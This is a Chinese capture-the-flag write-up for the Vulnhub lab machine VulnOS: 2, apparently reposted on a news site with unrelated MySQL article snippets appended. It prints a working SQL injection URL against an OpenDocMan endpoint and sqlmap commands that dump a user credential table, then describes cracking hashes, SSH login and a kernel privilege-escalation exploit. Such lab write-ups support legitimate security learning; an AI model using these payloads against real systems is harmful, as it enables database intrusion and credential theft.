Vulnhub靶机 VULNOS: 2 writeup

news/2024/11/1 10:27:22/

下载地址:https://www.vulnhub.com/entry/vulnos-2,147/

在这里插入图片描述

信息搜集

获取IP地址

在这里插入图片描述

扫描端口

在这里插入图片描述

80端口

在这里插入图片描述
点击website跳转到/jabc
在这里插入图片描述
在 jabc/?q=node/7 页面看起来啥也没有,但是Ctrl+A全选之后看到提示还有一个目录 /jabcd0cs/
在这里插入图片描述
在这里插入图片描述
访问/jabcd0cs/
在这里插入图片描述
在/jabcd0cs/发现CMS的版本,使用searchsploit查询
在这里插入图片描述
在这里插入图片描述
这里看到了pyload

http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9

可以利用
在这里插入图片描述
使用sqlmap跑库

sqlmap -u "http://192.168.1.172/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level=3 --dbs

在这里插入图片描述
跑表名

sqlmap -u "http://192.168.1.172/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level=3 -D jabcd0cs --tables

在这里插入图片描述
在odm_user表里面发现了有用户名密码

sqlmap -u "http://192.168.1.172/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level=3 -D jabcd0cs -T odm_user --dump

在这里插入图片描述
将获取的哈希值解密
在这里插入图片描述

getshell

使用获取的用户名密码尝试登录ssh,使用webmin用户登录成功
在这里插入图片描述

提权

查看系统版本,内核版本
在这里插入图片描述
使用searchsploit查询找到一个符合条件的exp
在这里插入图片描述
将exp上传到靶机,赋予可执行权限,编译并执行,成功获取root权限
在这里插入图片描述
拿到root目录下的flag
在这里插入图片描述
到这里成功完成了该靶机!
**本文所有用到的工具都可以关注微信公众号“网络安全学习爱好者”联系公众客服免费领取! **
在这里插入图片描述


http://www.ppmy.cn/news/658995.html

相关文章

MySQL:replace函数的几种实用场景,一个回答引发热烈讨论

| 7 | 疾风剑豪 | 亚索 | 6300 | —---------------------------------- 7 rows in set (0.00 sec) []()使用场景1 – (Query语句):---------------------------------------------------------------------------------需求:把"hero\_title"…

MySQL:replace函数的几种实用场景

MySQL的Replace函数都有哪些用法,你是否都知晓呢?今天,让我带大家花几分钟时间来一起看一看,记得Mark! 目录 REPLACE语法操作实例使用场景1 -- (Query语句):使用场景2 -- (update语句):使用场景…

MySQL最左匹配原则,道儿上兄弟都得知道的原则

自MySQL5.5版本起,主流的索引结构转为B树。B树的节点存储索引顺序是从左向右存储,在检索匹配的时候也要满足自左向右匹配。 目录 一、最左匹配原则的原理二、违背最左原则导致索引失效的情况三、查询优化器偷偷干了哪些事儿四、需要你mark的知识点1、如何…

【图文详解:索引极简教程】SQL 查询性能优化原理

简介 在一本厚厚的书籍的前几页,通常会有几页目录。作用是让读者可以快速找到感兴趣的章节进行阅读。 目录之所以可以快速阅读,是因为它提前进行了结构化有序处理。 同样的道理,数据库的数据表的文件下面(以 ClickHouse 为例),通常…

触摸精灵 关于三剑豪手游的练级(练到10级) 制作 请大家帮忙一下!!谢谢大家了

SCREEN_RESOLUTION"768x1024"; SCREEN_COLOR_BITS32;-- 主入口 function main()rotateScreen(0);mSleep(1583);touchDown(11, 237, 808)mSleep(121);touchUp(11)mSleep(1000);touchDown(1, 673, 953)mSleep(151);touchUp(1)mSleep(1000);touchDown(11, 238, 816)mSle…

MySQL的order by该如何避免“未命中索引“

不少同学私信我说,用Explain查看Order By语句执行计划时经常发现用不上索引,难道花好多时间和资源创建的联合索引都摆烂了?今天我把几个同学遇到的情况整理出来,做一个Order By使用索引的坑点分享。希望对你有用。 要学会如何使用…

Java岗大厂面试百日冲刺 - 日积月累,每日三题【Day7】 —— 数据库2(事务)

大家好,我是陈哈哈,北漂五年。认识我的朋友们知道,我是非科班出身,半路出家,大学也很差!这种背景来北漂,你都不知道你会经历什么🙃🙃。   不敢苟同,相信大家…

深夜小酌,50道经典SQL题,真香~

晚上听说我们村子快解封了,居家办公的日子已不多,久久不能平息~~ 蹲坑之余,在网上找到了50道所谓经典SQL题,这不就是深夜必备小菜?我用脚叼起拖鞋,从冰箱拿出封印已久的半瓶可乐,打开数日未见的…